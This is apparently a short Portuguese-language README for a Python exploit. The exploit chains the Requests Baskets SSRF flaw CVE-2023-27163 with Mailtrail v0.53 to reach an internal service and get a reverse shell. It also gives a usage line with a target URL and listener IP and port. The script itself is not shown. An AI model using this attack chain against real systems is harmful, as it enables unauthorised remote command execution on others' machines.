
Exploit em Python encadeando SSRF CVE-2023-27163 no Requests Baskets com Mailtrail v0.53 para encaminhar serviços internos e executar um reverse shell.
O exploit a seguir abusa da vulnerabilidade SSRF do Requests Baskets v1.2.1 para encaminhar a aplicação interna em execução em 127.0.0.1:80 para a aplicação externa em /pwned. Depois que a aplicação Mailtrail v0.53 for encaminhada, ela executará um comando de reverse shell contra ela e, em alguns segundos, o usuário deverá obter um reverse shell na máquina.
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT